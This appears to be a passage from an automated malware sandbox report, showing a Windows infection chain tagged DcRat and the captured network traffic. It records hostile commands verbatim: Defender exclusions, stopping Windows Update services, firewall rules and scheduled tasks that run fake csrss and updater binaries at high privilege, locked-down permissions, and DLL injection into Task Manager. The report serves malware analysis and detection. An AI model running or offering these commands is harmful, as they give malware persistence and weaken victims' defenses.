        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:5796
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        5⤵
        
        PID:5056
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:6100
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        5⤵
        
        PID:6028
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        5⤵
        
        PID:3856
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        5⤵
        
        PID:5920
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      Loads dropped DLL
      PID:4140
- C:\Users\Admin\AppData\Local\Temp\1F22.exe
  C:\Users\Admin\AppData\Local\Temp\1F22.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2324
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5940
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:5612
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:4340
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:232
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:5532
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:376
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5132
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5848
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3776
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        
        PID:3484
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:4144
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5788
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3356
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:1848
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5956
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5360
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        
        PID:4236
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:2836
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:1736
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:5388
- - C:\Users\Admin\AppData\Local\Temp\source1.exe
    "C:\Users\Admin\AppData\Local\Temp\source1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:6032
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:4240
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:392
- C:\Users\Admin\AppData\Local\Temp\3088.exe
  C:\Users\Admin\AppData\Local\Temp\3088.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1504
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 792
    3⤵
    - Program crash
    PID:5216
- C:\Users\Admin\AppData\Local\Temp\32DB.exe
  C:\Users\Admin\AppData\Local\Temp\32DB.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1400
- C:\Users\Admin\AppData\Local\Temp\34B0.exe
  C:\Users\Admin\AppData\Local\Temp\34B0.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:6056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4288
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:8
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1584
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:452
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2128
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4556
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:4608
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1212
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:5600
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5184
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4748
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3224
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1404
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5760
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5268
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5816
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2152
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5560
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1212
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5500
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4040
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5756
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5300
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4180
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1980
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:1200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 988 -ip 988
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3664 -ip 3664
1⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4024 -ip 4024
1⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2952 -ip 2952
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4020 -ip 4020
1⤵
PID:4656

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\iB7uQ5mm.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\iB7uQ5mm.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4908
- C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1mG04nt9.exe
  C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1mG04nt9.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4052
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:4708
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:2204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 540
      4⤵
      Program crash
      PID:5256
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 608
    3⤵
    - Program crash
    PID:6124
- C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ry631Xj.exe
  C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ry631Xj.exe
  2⤵
  - Executes dropped EXE
  PID:464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5784 -ip 5784
1⤵
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4052 -ip 4052
1⤵
PID:6068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2204 -ip 2204
1⤵
PID:920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6044 -ip 6044
1⤵
PID:5216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1504 -ip 1504
1⤵
PID:5700

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:3680

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:5228

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1996

Network

DNS

138.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.32.126.40.in-addr.arpa

IN PTR

Response
DNS

126.177.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.177.238.8.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

54.120.234.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.120.234.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301244_17N91ZKZSGROIQHSO&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301244_17N91ZKZSGROIQHSO&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 91993
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 68695AEEB43F4667A976132BC7F55275 Ref B: DUS30EDGE0314 Ref C: 2023-10-11T02:56:15Z
date: Wed, 11 Oct 2023 02:56:14 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301653_1VKC04F354IQVXJN4&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301653_1VKC04F354IQVXJN4&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 97422
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C0B644478E7E47A09180B4053110B001 Ref B: DUS30EDGE0314 Ref C: 2023-10-11T02:56:15Z
date: Wed, 11 Oct 2023 02:56:14 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301713_1BAGKMP8PJ38B402W&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301713_1BAGKMP8PJ38B402W&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 329955
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A005C8DD6CAD4EEA888FEA4DFBF0FA81 Ref B: DUS30EDGE0314 Ref C: 2023-10-11T02:56:15Z
date: Wed, 11 Oct 2023 02:56:14 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301304_1KWQNFDZMYS43H6WK&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301304_1KWQNFDZMYS43H6WK&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 355353
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 61823B753D134B26A9C3658B537E02E0 Ref B: DUS30EDGE0314 Ref C: 2023-10-11T02:56:16Z
date: Wed, 11 Oct 2023 02:56:15 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301322_1IMGOU8B39OAT83XI&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301322_1IMGOU8B39OAT83XI&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 207355
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4E61FEE97A6F4060875D700880CF0F3F Ref B: DUS30EDGE0314 Ref C: 2023-10-11T02:56:17Z
date: Wed, 11 Oct 2023 02:56:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301731_1DFC4Q9TO32IVPF8Q&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301731_1DFC4Q9TO32IVPF8Q&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 180678
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 64C3B959C1A44959975468112C7834E8 Ref B: DUS30EDGE0314 Ref C: 2023-10-11T02:56:21Z
date: Wed, 11 Oct 2023 02:56:20 GMT
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.247.35
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:Kz_oiG5gf4StSS1f0Qyfj1aEAgI7aA:ohkxlk3tADPw1O2f
DNS

35.247.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.247.240.157.in-addr.arpa

